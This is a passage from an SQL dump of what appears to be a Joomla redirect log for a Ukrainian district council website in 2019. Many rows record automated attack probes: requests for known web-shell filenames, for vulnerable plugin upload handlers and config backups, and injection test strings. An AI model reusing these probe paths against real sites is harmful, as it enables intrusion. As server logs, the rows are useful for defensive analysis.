00:00:00',301),(33392,'https://malyn-rayrada.gov.ua/system/storage/logs/seo_script.php',NULL,'','',1,0,'2019-04-26 12:56:21','0000-00-00 00:00:00',301),(33393,'https://malyn-rayrada.gov.ua/ludk.php',NULL,'','',1,0,'2019-04-26 16:11:46','0000-00-00 00:00:00',301),(33394,'https://malyn-rayrada.gov.ua/modules/vtemslideshow/uploadimage.php',NULL,'http://www.malyn-rayrada.gov.ua/modules/vtemslideshow/uploadimage.php','',2,0,'2019-04-26 19:27:42','0000-00-00 00:00:00',301),(33395,'https://malyn-rayrada.gov.ua/wp-installation.php',NULL,'','',5,0,'2019-04-26 21:15:04','0000-00-00 00:00:00',301),(33396,'https://malyn-rayrada.gov.ua/upgrade.php',NULL,'','',2,0,'2019-04-26 22:55:58','0000-00-00 00:00:00',301),(33397,'https://malyn-rayrada.gov.ua/script.php',NULL,'','',1,0,'2019-04-27 03:48:05','0000-00-00 00:00:00',301),(33398,'https://malyn-rayrada.gov.ua/system/logs/seo_script.php',NULL,'','',1,0,'2019-04-27 05:18:46','0000-00-00 00:00:00',301),(33399,'https://malyn-rayrada.gov.ua/reade.php',NULL,'','',1,0,'2019-04-27 06:49:53','0000-00-00 00:00:00',301),(33400,'https://malyn-rayrada.gov.ua/htaccess.php',NULL,'','',4,0,'2019-04-27 12:10:49','0000-00-00 00:00:00',301),(33401,'https://malyn-rayrada.gov.ua/test.php',NULL,'','',11,0,'2019-04-27 16:51:24','0000-00-00 00:00:00',301),(33402,'https://www.malyn-rayrada.gov.ua/attachments/article/1919/ð¿ñ–ð´ññƒð¼ðºð¸ ð³ð¾ð»ð¾ñ 22 ñðµññ–ñ 02.02.2018.pdf',NULL,'','',1,0,'2019-04-27 18:33:54','0000-00-00 00:00:00',301),(33403,'https://malyn-rayrada.gov.ua/get.php?key=sdfadsgh4513sdgg435341fdgwwdfgdfhdfgdsfgdfsgdfg',NULL,'','',2,0,'2019-04-27 18:46:54','0000-00-00 00:00:00',301),(33404,'https://malyn-rayrada.gov.ua/trackback.php',NULL,'','',2,0,'2019-04-28 01:35:43','0000-00-00 00:00:00',301),(33405,'https://malyn-rayrada.gov.ua/beck/cron.php',NULL,'','',1,0,'2019-04-28 05:00:41','0000-00-00 00:00:00',301),(33406,'https://malyn-rayrada.gov.ua/sqlibak.php',NULL,'','',2,0,'2019-04-28 11:47:44','0000-00-00 00:00:00',301),(33407,'https://malyn-rayrada.gov.ua/images/defau1t.php',NULL,'','',5,0,'2019-04-28 15:40:27','0000-00-00 00:00:00',301),(33408,'https://malyn-rayrada.gov.ua/images/xxx.php',NULL,'','',2,0,'2019-04-28 16:59:25','0000-00-00 00:00:00',301),(33409,'https://malyn-rayrada.gov.ua/mobile_detect.php',NULL,'','',1,0,'2019-04-28 18:51:50','0000-00-00 00:00:00',301),(33410,'https://www.malyn-rayrada.gov.ua/attachments/article/1691/ð¿ñ–ð´ññƒð¼ðºð¸ ð²ñ–ð´ðºñ€ð¸ñ‚ð¾ð³ð¾ ð³ð¾ð»ð¾ññƒð²ð°ð½ð½ñ1.pdf',NULL,'','',1,0,'2019-04-28 22:52:48','0000-00-00 00:00:00',301),(33411,'https://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennia-vid-151217-roku\'',NULL,'','',1,0,'2019-04-30 17:24:24','0000-00-00 00:00:00',301),(33412,'https://malyn-rayrada.gov.ua/components/com_sexycontactform/fileupload/index.php',NULL,'http://www.malyn-rayrada.gov.ua/components/com_sexycontactform/fileupload/index.php','',2,0,'2019-05-01 04:00:55','0000-00-00 00:00:00',301),(33413,'https://www.malyn-rayrada.gov.ua/index.php/1730-nikoli-znovu&tbnid=uy8fog-9nppewm&vet=1&docid=dw3siaau08bvdm&w=650&h=488&hl=ru&source=sh/x/im',NULL,'','',2,0,'2019-05-02 08:09:10','0000-00-00 00:00:00',301),(33414,'https://malyn-rayrada.gov.ua/imgsrc=\'//old.kurs.com.ua/static/images/informer/kurs.png\'width=\'52\'height=\'26\'alt=\'kurs.com.ua:курсвалютвукраине!\'title=\'курсвалют\'border=\'0\'/',NULL,'','',4,0,'2019-05-07 23:17:34','0000-00-00 00:00:00',301),(33415,'https://malyn-rayrada.gov.ua/wp-content/themes/cameleon/includes/fileuploader/upload_handler.php',NULL,'http://www.malyn-rayrada.gov.ua/wp-content/themes/cameleon/includes/fileuploader/upload_handler.php','',1,0,'2019-05-08 05:43:05','0000-00-00 00:00:00',301),(33416,'https://malyn-rayrada.gov.ua/attachments/article/2060/ð¿ð¸ñ‚ð°ð½ð½ñ ð¢ð¾ð¼ð¾ññƒ.pdf',NULL,'','',2,0,'2019-05-08 17:14:04','0000-00-00 00:00:00',301),(33417,'https://www.malyn-rayrada.gov.ua/index.php/1730-nikoli-znovu&tbnid=uy8fog-9nppewm&vet=1&docid=dw3siaau08bvdm&w=650&h=488&hl=uk-ua&source=sh/x/im',NULL,'','',1,0,'2019-05-09 05:00:35','0000-00-00 00:00:00',301),(33418,'https://www.malyn-rayrada.gov.ua/index.php/1730-nikoli-znovu&docid=dw3siaau08bvdm&tbnid=uy8fog-9nppewm&vet=1&source=sh/x/im',NULL,'','',1,0,'2019-05-09 10:40:02','0000-00-00 00:00:00',301),(33419,'https://www.malyn-rayrada.gov.ua/index.php/1730-nikoli-znovu&tbnid=uy8fog-9nppewm&vet=1&docid=dw3siaau08bvdm&w=650&h=488&hl=ru-ua&source=sh/x/im',NULL,'','',1,0,'2019-05-09 14:20:17','0000-00-00 00:00:00',301),(33420,'https://malyn-rayrada.gov.ua/wp-content/themes/evolve/js/back-end/libraries/fileuploader/upload_handler.php',NULL,'http://www.malyn-rayrada.gov.ua/wp-content/themes/evolve/js/back-end/libraries/fileuploader/upload_handler.php','',1,0,'2019-05-09 18:41:37','0000-00-00 00:00:00',301),(33421,'https://malyn-rayrada.gov.ua//index.php?start=7\'\"`',NULL,'http://www.google.com/\'\"`','',2,0,'2019-05-10 13:24:55','0000-00-00 00:00:00',301),(33422,'https://malyn-rayrada.gov.ua//index.php?start=14\'\"`',NULL,'http://www.google.com/\'\"`','',1,0,'2019-05-10 13:24:56','0000-00-00 00:00:00',301),(33423,'https://malyn-rayrada.gov.ua//index.php?start=21\'\"`',NULL,'http://www.google.com/\'\"`','',1,0,'2019-05-10 13:24:56','0000-00-00 00:00:00',301),(33424,'https://malyn-rayrada.gov.ua//index.php?start=28\'\"`',NULL,'http://www.google.com/\'\"`','',1,0,'2019-05-10 13:24:57','0000-00-00 00:00:00',301),(33425,'https://malyn-rayrada.gov.ua//index.php?start=35\'\"`',NULL,'http://www.google.com/\'\"`','',1,0,'2019-05-10 13:24:58','0000-00-00 00:00:00',301),(33426,'https://malyn-rayrada.gov.ua//index.php?start=42\'\"`',NULL,'http://www.google.com/\'\"`','',1,0,'2019-05-10 13:24:59','0000-00-00 00:00:00',301),(33427,'https://malyn-rayrada.gov.ua//index.php?start=49\'\"`',NULL,'http://www.google.com/\'\"`','',1,0,'2019-05-10 13:24:59','0000-00-00 00:00:00',301),(33428,'https://malyn-rayrada.gov.ua//index.php?start=56\'\"`',NULL,'http://www.google.com/\'\"`','',1,0,'2019-05-10 13:25:00','0000-00-00 00:00:00',301),(33429,'https://malyn-rayrada.gov.ua//index.php?start=63\'\"`',NULL,'http://www.google.com/\'\"`','',1,0,'2019-05-10 13:25:01','0000-00-00 00:00:00',301),(33430,'https://malyn-rayrada.gov.ua//index.php?start=231\'\"`',NULL,'http://www.google.com/\'\"`','',1,0,'2019-05-10 13:25:02','0000-00-00 00:00:00',301),(33431,'https://malyn-rayrada.gov.ua//img src=\'\"`',NULL,'http://www.google.com/\'\"`','',1,0,'2019-05-10 13:25:03','0000-00-00 00:00:00',301),(33432,'https://malyn-rayrada.gov.ua//\'\"`',NULL,'http://www.google.com/\'\"`','',1,0,'2019-05-10 13:25:03','0000-00-00 00:00:00',301),(33433,'https://malyn-rayrada.gov.ua//index.php',NULL,'http://www.google.com/\'\"`','',253,0,'2019-05-10 13:25:04','0000-00-00 00:00:00',301),(33434,'https://malyn-rayrada.gov.ua/post-a-job/',NULL,'http://www.malyn-rayrada.gov.ua/post-a-job/','',1,0,'2019-05-11 04:19:31','0000-00-00 00:00:00',301),(33435,'https://malyn-rayrada.gov.ua/cms/wp-login.php',NULL,'http://malyn-rayrada.gov.ua/cms/wp-login.php','',1,0,'2019-05-11 15:33:07','0000-00-00 00:00:00',301),(33436,'https://malyn-rayrada.gov.ua/wp-content/uploads/levoslideshow/1_uploadfolder/big/',NULL,'http://www.malyn-rayrada.gov.ua/wp-content/uploads/levoslideshow/1_uploadfolder/big/','',1,0,'2019-05-12 13:10:24','0000-00-00 00:00:00',301),(33437,'https://malyn-rayrada.gov.ua/wp-sbb.php',NULL,'','',3,0,'2019-05-13 07:36:36','0000-00-00 00:00:00',301),(33438,'https://malyn-rayrada.gov.ua/theme/assets/global/plugins/jquery-file-upload/server/php/',NULL,'http://www.malyn-rayrada.gov.ua/theme/assets/global/plugins/jquery-file-upload/server/php/','',2,0,'2019-05-13 18:37:05','0000-00-00 00:00:00',301),(33439,'https://malyn-rayrada.gov.ua/11.php',NULL,'','',7,0,'2019-05-14 01:48:30','0000-00-00 00:00:00',301),(33440,'https://malyn-rayrada.gov.ua/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/upload.php',NULL,'','',1,0,'2019-05-14 12:13:41','0000-00-00 00:00:00',301),(33441,'https://malyn-rayrada.gov.ua/upload/server/php/',NULL,'http://www.malyn-rayrada.gov.ua/upload/server/php/','',3,0,'2019-05-15 01:04:25','0000-00-00 00:00:00',301),(33442,'https://malyn-rayrada.gov.ua/images/readmes.php',NULL,'','',3,0,'2019-05-16 01:07:26','0000-00-00 00:00:00',301),(33443,'https://malyn-rayrada.gov.ua/admin/',NULL,'http://malyn-rayrada.gov.ua/admin/','',7,0,'2019-05-16 13:32:13','0000-00-00 00:00:00',301),(33444,'https://malyn-rayrada.gov.ua/wp-content/plugins/reflex-gallery/admin/scripts/fileuploader/php.php',NULL,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php','',1,0,'2019-05-16 18:21:32','0000-00-00 00:00:00',301),(33445,'https://malyn-rayrada.gov.ua/tmp.php',NULL,'','',3,0,'2019-05-18 11:53:31','0000-00-00 00:00:00',301),(33446,'https://malyn-rayrada.gov.ua/index.php/2212-ogoloshennya-vid-10-04-2019-roku-shchodo-orendi-majna',NULL,'','',16,0,'2019-05-21 14:06:32','0000-00-00 00:00:00',301),(33447,'https://malyn-rayrada.gov.ua/backups.php?mode=config&key=c6y1f2ea7217pbtl1flch98sopfo/r1z76/okfae',NULL,'','',3,0,'2019-05-22 12:30:34','0000-00-00 00:00:00',301),(33448,'https://malyn-rayrada.gov.ua/attachments/article/1942/history%20malyn%20region2.pdf',NULL,'','',1,0,'2019-05-24 13:19:40','0000-00-00 00:00:00',301),(33449,'https://malyn-rayrada.gov.ua/wp-admin/css/colors/blue/theme.php',NULL,'','',2,0,'2019-05-27 20:25:30','0000-00-00 00:00:00',301),(33450,'https://malyn-rayrada.gov.ua/wp-content/plugins/easyrotator-for-wordpress/prv8.php',NULL,'','',1,0,'2019-05-29 18:45:17','0000-00-00 00:00:00',301),(33451,'https://malyn-rayrada.gov.ua/attachments/article/1883/%d0%bf%d1%96%d0%b4%d1%81%d1%83%d0%bc%d0%ba%d0%b8%20%d0%b3%d0%be%d0%bb%d0%be%d1%81%d1%83%d0%b2%d0%b0%d0%bd%d0%bd%d1%8f%2021-7.pdf',NULL,'','',1,0,'2019-05-31 20:06:58','0000-00-00 00:00:00',301),(33452,'https://malyn-rayrada.gov.ua/wp/xmlrpc.php',NULL,'','',1,0,'2019-06-01 00:00:44','0000-00-00 00:00:00',301),(33453,'https://malyn-rayrada.gov.ua/blog/xmlrpc.php',NULL,'','',1,0,'2019-06-01 00:00:45','0000-00-00 00:00:00',301),(33454,'https://malyn-rayrada.gov.ua/wordpress/xmlrpc.php',NULL,'','',1,0,'2019-06-01 00:00:46','0000-00-00 00:00:00',301),(33455,'https://malyn-rayrada.gov.ua/attachments/article/1638/ðÿð¾ñ–ð¼ðµð½ð½ðµ ð³ð¾ð»ð¾ñ ñƒð²ð°ð½ð½ñ  14.pdf',NULL,'','',3,0,'2019-06-06 07:03:20','0000-00-00 00:00:00',301),(33456,'https://malyn-rayrada.gov.ua/scripts/popup-pomo.php',NULL,'http://site.ru','',4,0,'2019-06-08 11:32:24','0000-00-00 00:00:00',301),(33457,'https://malyn-rayrada.gov.ua/mhbgf.php',NULL,'http://site.ru','',5,0,'2019-06-08 11:54:30','0000-00-00 00:00:00',301),(33458,'https://malyn-rayrada.gov.ua/wp-logout.php',NULL,'http://site.ru','',4,0,'2019-06-08 12:29:27','0000-00-00 00:00:00',301),(33459,'https://malyn-rayrada.gov.ua/styles/popup-pomo.php',NULL,'http://site.ru','',4,0,'2019-06-08 12:48:17','0000-00-00 00:00:00',301),(33460,'https://malyn-rayrada.gov.ua/pressthis/popup-pomo.php',NULL,'http://site.ru','',2,0,'2019-06-08 13:14:21','0000-00-00 00:00:00',301),(33461,'https://malyn-rayrada.gov.ua/home.php',NULL,'http://site.ru','',2,0,'2019-06-08 13:49:38','0000-00-00 00:00:00',301),(33462,'https://malyn-rayrada.gov.ua/mini.php',NULL,'http://site.ru','',5,0,'2019-06-08 15:04:36','0000-00-00 00:00:00',301),(33463,'https://malyn-rayrada.gov.ua/sec.php',NULL,'http://site.ru','',6,0,'2019-06-08 15:31:02','0000-00-00 00:00:00',301),(33464,'https://malyn-rayrada.gov.ua/wp-post.php',NULL,'http://site.ru','',1,0,'2019-06-08 17:03:25','0000-00-00 00:00:00',301),(33465,'https://malyn-rayrada.gov.ua/wso.php',NULL,'http://site.ru','',16,0,'2019-06-08 17:21:19','0000-00-00 00:00:00',301),(33466,'https://malyn-rayrada.gov.ua/sherwoods.php',NULL,'http://site.ru','',3,0,'2019-06-08 18:14:25','0000-00-00 00:00:00',301),(33467,'https://malyn-rayrada.gov.ua/wp-back.php',NULL,'http://site.ru','',6,0,'2019-06-08 18:17:15','0000-00-00 00:00:00',301),(33468,'https://malyn-rayrada.gov.ua/mrswenvsr.php',NULL,'http://site.ru','',3,0,'2019-06-08 18:24:41','0000-00-00 00:00:00',301),(33469,'https://malyn-rayrada.gov.ua/config-sample.php',NULL,'http://site.ru','',2,0,'2019-06-08 18:43:40','0000-00-00 00:00:00',301),(33470,'https://malyn-rayrada.gov.ua/xmliipc.php',NULL,'http://site.ru','',1,0,'2019-06-08 19:16:34','0000-00-00 00:00:00',301),(33471,'https://malyn-rayrada.gov.ua/_.php',NULL,'http://site.ru','',2,0,'2019-06-08 19:38:43','0000-00-00 00:00:00',301),(33472,'https://malyn-rayrada.gov.ua/term/popup-pomo.php',NULL,'http://site.ru','',4,0,'2019-06-08 20:06:10','0000-00-00 00:00:00',301),(33473,'https://malyn-rayrada.gov.ua/mide.php',NULL,'http://site.ru','',4,0,'2019-06-08 20:07:41','0000-00-00 00:00:00',301),(33474,'https://malyn-rayrada.gov.ua/user.php',NULL,'http://site.ru','',5,0,'2019-06-08 21:50:02','0000-00-00 00:00:00',301),(33475,'https://malyn-rayrada.gov.ua/theme.php',NULL,'http://site.ru','',4,0,'2019-06-08 22:19:47','0000-00-00 00:00:00',301),(33476,'https://malyn-rayrada.gov.ua/permalink/popup-pomo.php',NULL,'http://site.ru','',2,0,'2019-06-08 22:25:34','0000-00-00 00:00:00',301),(33477,'https://malyn-rayrada.gov.ua/modules/mod_ariimageslidersa/098.php',NULL,'http://site.ru','',2,0,'2019-06-08 22:43:21','0000-00-00 00:00:00',301),(33478,'https://malyn-rayrada.gov.ua/wordpress/wp-admin/install.php',NULL,'','',7,0,'2019-06-09 01:21:22','0000-00-00 00:00:00',301),(33479,'https://malyn-rayrada.gov.ua/bigm.php',NULL,'http://site.ru','',5,0,'2019-06-09 05:39:12','0000-00-00 00:00:00',301),(33480,'https://malyn-rayrada.gov.ua/libraries/joomla/template/mark.php',NULL,'http://site.ru','',10,0,'2019-06-09 06:37:24','0000-00-00 00:00:00',301),(33481,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/4.5pt',NULL,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennya-vid-23-12-2015-roku?format=feed&type=rss','',1,0,'2019-06-09 06:44:40','0000-00-00 00:00:00',301),(33482,'https://malyn-rayrada.gov.ua/wp-mains.php',NULL,'http://site.ru','',2,0,'2019-06-09 06:58:13','0000-00-00 00:00:00',301),(33483,'https://malyn-rayrada.gov.ua/assets/images/wp-console.php',NULL,'http://site.ru','',5,0,'2019-06-09 07:28:18','0000-00-00 00:00:00',301),(33484,'https://malyn-rayrada.gov.ua/ws.php',NULL,'http://site.ru','',5,0,'2019-06-09 07:35:41','0000-00-00 00:00:00',301),(33485,'https://malyn-rayrada.gov.ua/logs/logs.php',NULL,'http://site.ru','',3,0,'2019-06-09 07:36:06','0000-00-00 00:00:00',301),(33486,'https://malyn-rayrada.gov.ua/sizings.php',NULL,'http://site.ru','',3,0,'2019-06-09 07:52:52','0000-00-00 00:00:00',301),(33487,'https://malyn-rayrada.gov.ua/rois.php',NULL,'http://site.ru','',3,0,'2019-06-09 08:17:22','0000-00-00 00:00:00',301),(33488,'https://malyn-rayrada.gov.ua/default.php',NULL,'http://site.ru','',5,0,'2019-06-09 08:38:52','0000-00-00 00:00:00',301),(33489,'https://malyn-rayrada.gov.ua/w.php',NULL,'http://site.ru','',9,0,'2019-06-09 08:49:53','0000-00-00 00:00:00',301),(33490,'https://malyn-rayrada.gov.ua/x.php',NULL,'http://site.ru','',11,0,'2019-06-09 09:28:26','0000-00-00 00:00:00',301),(33491,'https://malyn-rayrada.gov.ua/lfm.php',NULL,'http://site.ru','',8,0,'2019-06-09 09:28:27','0000-00-00 00:00:00',301),(33492,'https://malyn-rayrada.gov.ua/yusa.php',NULL,'http://site.ru','',3,0,'2019-06-09 09:29:21','0000-00-00 00:00:00',301),(33493,'https://malyn-rayrada.gov.ua/js.php',NULL,'http://site.ru','',7,0,'2019-06-09 09:35:35','0000-00-00 00:00:00',301),(33494,'https://malyn-rayrada.gov.ua/setupconfig/popup-pomo.php',NULL,'http://site.ru','',2,0,'2019-06-09 10:03:22','0000-00-00 00:00:00',301),(33495,'https://malyn-rayrada.gov.ua/libraries/joomla/template/mide.php',NULL,'http://site.ru','',3,0,'2019-06-09 10:03:50','0000-00-00 00:00:00',301),(33496,'https://malyn-rayrada.gov.ua/baws.php',NULL,'http://site.ru','',4,0,'2019-06-09 10:30:01','0000-00-00 00:00:00',301),(33497,'https://malyn-rayrada.gov.ua/config.php',NULL,'http://site.ru','',8,0,'2019-06-09 10:31:28','0000-00-00 00:00:00',301),(33498,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/06/',NULL,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/publichna-informacija-2?format=feed&type=rss','',1,0,'2019-06-09 10:37:12','0000-00-00 00:00:00',301),(33499,'https://malyn-rayrada.gov.ua/wp-organizer.php',NULL,'http://site.ru','',4,0,'2019-06-09 10:58:35','0000-00-00 00:00:00',301),(33500,'https://www.malyn-rayrada.gov.ua/index.php/2212-ogoloshennya-vid-10-04-2019-roku-shchodo-orendi-majna',NULL,'','',7,0,'2019-06-09 12:41:12','0000-00-00 00:00:00',301),(33501,'https://malyn-rayrada.gov.ua/so.php',NULL,'http://site.ru','',3,0,'2019-06-09 14:56:21','0000-00-00 00:00:00',301),(33502,'https://malyn-rayrada.gov.ua/00.php',NULL,'http://site.ru','',3,0,'2019-06-09 15:27:20','0000-00-00 00:00:00',301),(33503,'https://malyn-rayrada.gov.ua/cgi.php',NULL,'http://site.ru','',4,0,'2019-06-09 15:27:48','0000-00-00 00:00:00',301),(33504,'https://malyn-rayrada.gov.ua/postnew/popup-pomo.php',NULL,'http://site.ru','',5,0,'2019-06-09 15:51:34','0000-00-00 00:00:00',301),(33505,'https://malyn-rayrada.gov.ua/systems.php',NULL,'http://site.ru','',2,0,'2019-06-09 15:58:50','0000-00-00 00:00:00',301),(33506,'https://malyn-rayrada.gov.ua/inc.php',NULL,'http://site.ru','',3,0,'2019-06-09 16:15:08','0000-00-00 00:00:00',301),(33507,'https://malyn-rayrada.gov.ua/components/com_foxcontact/1.php',NULL,'http://site.ru','',10,0,'2019-06-09 16:43:39','0000-00-00 00:00:00',301),(33508,'https://malyn-rayrada.gov.ua/wp-xmlrpc.php',NULL,'http://site.ru','',1,0,'2019-06-09 17:58:43','0000-00-00 00:00:00',301),(33509,'https://malyn-rayrada.gov.ua/profile/popup-pomo.php',NULL,'http://site.ru','',7,0,'2019-06-09 18:27:31','0000-00-00 00:00:00',301),(33510,'https://malyn-rayrada.gov.ua/admin_login.php',NULL,'http://site.ru','',5,0,'2019-06-09 18:27:45','0000-00-00 00:00:00',301),(33511,'https://malyn-rayrada.gov.ua/404.php',NULL,'http://site.ru','',6,0,'2019-06-09 18:49:38','0000-00-00 00:00:00',301),(33512,'https://malyn-rayrada.gov.ua/a.php',NULL,'http://site.ru','',8,0,'2019-06-09 19:10:42','0000-00-00 00:00:00',301),(33513,'https://malyn-rayrada.gov.ua/widgets/popup-pomo.php',NULL,'http://site.ru','',4,0,'2019-06-09 19:14:25','0000-00-00 00:00:00',301),(33514,'https://malyn-rayrada.gov.ua/newsleter.php',NULL,'http://site.ru','',6,0,'2019-06-09 19:17:25','0000-00-00 00:00:00',301),(33515,'https://malyn-rayrada.gov.ua/k.php',NULL,'http://site.ru','',7,0,'2019-06-09 19:18:49','0000-00-00 00:00:00',301),(33516,'https://malyn-rayrada.gov.ua/install/popup-pomo.php',NULL,'http://site.ru','',3,0,'2019-06-10 02:33:16','0000-00-00 00:00:00',301),(33517,'https://malyn-rayrada.gov.ua/wp-press.php',NULL,'http://site.ru','',3,0,'2019-06-10 02:48:10','0000-00-00 00:00:00',301),(33518,'https://malyn-rayrada.gov.ua/food.php',NULL,'http://site.ru','',5,0,'2019-06-10 03:01:04','0000-00-00 00:00:00',301),(33519,'https://malyn-rayrada.gov.ua/wp-wpphp.php',NULL,'http://site.ru','',6,0,'2019-06-10 04:38:41','0000-00-00 00:00:00',301),(33520,'https://malyn-rayrada.gov.ua/pamelas.php',NULL,'http://site.ru','',3,0,'2019-06-10 05:05:01','0000-00-00 00:00:00',301),(33521,'https://malyn-rayrada.gov.ua/wp-form.php',NULL,'http://site.ru','',5,0,'2019-06-10 05:07:43','0000-00-00 00:00:00',301),(33522,'https://malyn-rayrada.gov.ua/conflg.php',NULL,'http://site.ru','',4,0,'2019-06-10 05:07:45','0000-00-00 00:00:00',301),(33523,'https://malyn-rayrada.gov.ua/conf.ini.php',NULL,'http://site.ru','',9,0,'2019-06-10 05:08:49','0000-00-00 00:00:00',301),(33524,'https://malyn-rayrada.gov.ua/c.php',NULL,'http://site.ru','',7,0,'2019-06-10 05:31:14','0000-00-00 00:00:00',301),(33525,'https://malyn-rayrada.gov.ua/menus/popup-pomo.php',NULL,'http://site.ru','',1,0,'2019-06-10 06:24:03','0000-00-00 00:00:00',301),(33526,'https://malyn-rayrada.gov.ua/v3.php',NULL,'http://site.ru','',7,0,'2019-06-10 06:55:19','0000-00-00 00:00:00',301),(33527,'https://malyn-rayrada.gov.ua/parseopml/popup-pomo.php',NULL,'http://site.ru','',4,0,'2019-06-10 08:30:34','0000-00-00 00:00:00',301),(33528,'https://malyn-rayrada.gov.ua/popup-pomo.php',NULL,'http://site.ru','',4,0,'2019-06-10 09:59:47','0000-00-00 00:00:00',301),(33529,'https://malyn-rayrada.gov.ua/h4ck_.php',NULL,'http://site.ru','',2,0,'2019-06-10 10:41:31','0000-00-00 00:00:00',301),(33530,'https://malyn-rayrada.gov.ua/network/popup-pomo.php',NULL,'http://site.ru','',3,0,'2019-06-10 11:33:43','0000-00-00 00:00:00',301),(33531,'https://malyn-rayrada.gov.ua/modules/mod_simplefileuploadv1.3/elements/help.php',NULL,'http://site.ru','',3,0,'2019-06-10 12:46:12','0000-00-00 00:00:00',301),(33532,'https://malyn-rayrada.gov.ua/roots.php',NULL,'http://site.ru','',4,0,'2019-06-10 14:30:42','0000-00-00 00:00:00',301),(33533,'https://malyn-rayrada.gov.ua/css.php',NULL,'http://site.ru','',3,0,'2019-06-10 14:34:21','0000-00-00 00:00:00',301),(33534,'https://malyn-rayrada.gov.ua/hx.php',NULL,'http://site.ru','',2,0,'2019-06-10 15:23:01','0000-00-00 00:00:00',301),(33535,'https://malyn-rayrada.gov.ua/ass.php',NULL,'http://site.ru','',4,0,'2019-06-10 17:46:47','0000-00-00 00:00:00',301),(33536,'https://malyn-rayrada.gov.ua/wp-blog-posts.php',NULL,'http://site.ru','',2,0,'2019-06-10 18:43:59','0000-00-00 00:00:00',301),(33537,'https://malyn-rayrada.gov.ua/maint/popup-pomo.php',NULL,'http://site.ru','',8,0,'2019-06-10 18:46:21','0000-00-00 00:00:00',301),(33538,'https://malyn-rayrada.gov.ua/wss.php',NULL,'http://site.ru','',5,0,'2019-06-10 19:53:07','0000-00-00 00:00:00',301),(33539,'https://malyn-rayrada.gov.ua/wp-inc.php',NULL,'http://site.ru','',2,0,'2019-06-10 20:10:45','0000-00-00 00:00:00',301),(33540,'https://malyn-rayrada.gov.ua/discussion/popup-pomo.php',NULL,'http://site.ru','',8,0,'2019-06-10 21:42:55','0000-00-00 00:00:00',301),(33541,'https://malyn-rayrada.gov.ua/babbitts.php',NULL,'http://site.ru','',4,0,'2019-06-10 22:08:48','0000-00-00 00:00:00',301),(33542,'https://malyn-rayrada.gov.ua/cache/content-post.php',NULL,'http://site.ru','',2,0,'2019-06-10 22:17:07','0000-00-00 00:00:00',301),(33543,'https://malyn-rayrada.gov.ua/.ftp.php',NULL,'http://site.ru','',6,0,'2019-06-10 22:39:44','0000-00-00 00:00:00',301),(33544,'https://malyn-rayrada.gov.ua/seter.php',NULL,'http://site.ru','',4,0,'2019-06-10 22:53:01','0000-00-00 00:00:00',301),(33545,'https://malyn-rayrada.gov.ua/wp-system.php',NULL,'http://site.ru','',5,0,'2019-06-11 00:13:55','0000-00-00 00:00:00',301),(33546,'https://malyn-rayrada.gov.ua/meta.php',NULL,'http://site.ru','',3,0,'2019-06-11 01:01:52','0000-00-00 00:00:00',301),(33547,'https://malyn-rayrada.gov.ua/cool.php',NULL,'http://site.ru','',3,0,'2019-06-11 01:23:25','0000-00-00 00:00:00',301),(33548,'https://malyn-rayrada.gov.ua/general/popup-pomo.php',NULL,'http://site.ru','',2,0,'2019-06-11 01:27:45','0000-00-00 00:00:00',301),(33549,'https://malyn-rayrada.gov.ua/images/logo_img.php',NULL,'http://site.ru','',3,0,'2019-06-12 12:01:12','0000-00-00 00:00:00',301),(33550,'https://malyn-rayrada.gov.ua/m1.php',NULL,'http://site.ru','',3,0,'2019-06-12 12:27:59','0000-00-00 00:00:00',301),(33551,'https://malyn-rayrada.gov.ua/.smileys/license.php',NULL,'http://site.ru','',3,0,'2019-06-12 12:29:54','0000-00-00 00:00:00',301),(33552,'https://malyn-rayrada.gov.ua/logs/logo_img.php',NULL,'http://site.ru','',4,0,'2019-06-12 12:59:14','0000-00-00 00:00:00',301),(33553,'https://malyn-rayrada.gov.ua/class-wp-inc.php',NULL,'http://site.ru','',2,0,'2019-06-12 13:51:05','0000-00-00 00:00:00',301),(33554,'https://malyn-rayrada.gov.ua/wp-console.php',NULL,'http://site.ru','',6,0,'2019-06-12 15:09:25','0000-00-00 00:00:00',301),(33555,'https://malyn-rayrada.gov.ua/install/models.php',NULL,'http://site.ru','',1,0,'2019-06-12 16:04:51','0000-00-00 00:00:00',301),(33556,'https://malyn-rayrada.gov.ua/hello.php',NULL,'http://site.ru','',9,0,'2019-06-12 17:01:19','0000-00-00 00:00:00',301),(33557,'https://malyn-rayrada.gov.ua/marvins.php',NULL,'http://site.ru','',13,0,'2019-06-12 17:50:11','0000-00-00 00:00:00',301),(33558,'https://malyn-rayrada.gov.ua/pdo.inc.php',NULL,'http://site.ru','',4,0,'2019-06-12 18:19:28','0000-00-00 00:00:00',301),(33559,'https://malyn-rayrada.gov.ua/y.php',NULL,'http://site.ru','',7,0,'2019-06-12 18:54:22','0000-00-00 00:00:00',301),(33560,'https://malyn-rayrada.gov.ua/cache/sok/s.php',NULL,'http://site.ru','',5,0,'2019-06-12 22:20:45','0000-00-00 00:00:00',301),(33561,'https://malyn-rayrada.gov.ua/wolfis.php',NULL,'http://site.ru','',3,0,'2019-06-12 22:43:30','0000-00-00 00:00:00',301),(33562,'https://malyn-rayrada.gov.ua/wp-thumb.php',NULL,'http://site.ru','',1,0,'2019-06-12 23:37:33','0000-00-00 00:00:00',301),(33563,'https://malyn-rayrada.gov.ua/wpa.php',NULL,'http://site.ru','',1,0,'2019-06-12 23:44:06','0000-00-00 00:00:00',301),(33564,'https://malyn-rayrada.gov.ua/index.php/2230-grafik-provedennya-zasidan-postijnikh-komisij-malinskoji-rajonnoji-radi-po-rozglyadu-pitan-yaki-vinosyatsya-na-30-sesiyu-rajonnoji-radi-7-sklikannya',NULL,'','',29,0,'2019-06-13 01:33:31','0000-00-00 00:00:00',301),(33565,'https://malyn-rayrada.gov.ua/m0m.php',NULL,'http://site.ru','',3,0,'2019-06-13 02:16:06','0000-00-00 00:00:00',301),(33566,'https://malyn-rayrada.gov.ua/lndex.php',NULL,'http://site.ru','',2,0,'2019-06-13 03:53:01','0000-00-00 00:00:00',301),(33567,'https://malyn-rayrada.gov.ua/templates/system/images/green.php',NULL,'http://site.ru','',4,0,'2019-06-14 08:36:27','0000-00-00 